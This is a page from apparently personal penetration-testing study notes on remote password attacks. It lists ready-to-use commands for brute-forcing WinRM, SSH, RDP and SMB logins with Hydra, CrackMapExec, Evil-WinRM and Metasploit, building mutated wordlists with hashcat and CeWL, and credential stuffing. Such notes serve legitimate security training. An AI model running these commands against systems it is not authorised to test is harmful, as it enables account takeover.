📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • Network Services
  • WinRM - 5985(HTTP), 5986(HTTPS)
  • SSH
  • Remote Desktop Protocol (RDP)
  • SMB
  • Metasploit Framework
  • Password Mutuations
  • Creating Wordlists
  • Hashcat
  • CeWL
  • Password Reuse / Default Passwords
  • Credential Stuffing
  1. Password Attacks

Remote Password Attacks

Network Services

WinRM - 5985(HTTP), 5986(HTTPS)

CrackMapExec

# Installation
sudo apt-get -y install crackmapexec

# Usage
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm ip -u user.list -p password.list

Evil-WinRM

# Installation
sudo gem install evil-winrm

# Usage
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i ip -u user -p password

SSH

Hydra

# Brute Forcing 
hydra -L user.list -P password.list ssh://ip

Remote Desktop Protocol (RDP)

Hydra

# Brute Forcing
hydra -L user.list -P password.list rdp://ip

SMB

Hydra

# Burte Force
hydra -L user.list -P password.list smb://ip

Metasploit Framework

# Brute Forcing Module
use auxiliary/scanner/smb/smb_login

Password Mutuations

Creating Wordlists

Hashcat

Function
Description

:

Do nothing.

l

Lowercase all letters.

u

Uppercase all letters.

c

Capitalize the first letter and lowercase others.

sXY

Replace all instances of X with Y.

$!

Add the exclamation character at the end.

# Generating Rule-based Wordlist
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

# Hashcat Existing Rules
ls /usr/share/hashcat/rules/

CeWL

# Creating Wordlist
cewl <https://Site.com> -d 4 -m 6 --lowercase -w created.wordlist

Password Reuse / Default Passwords

Credential Stuffing

# Hydra
# create a new list that separates credentials with a colon (username:password)
hydra -C <user_pass.list> <protocol>://<IP>
PreviousCracking FilesNextPivoting, Tunneling, and Port Forwarding

Last updated 2 years ago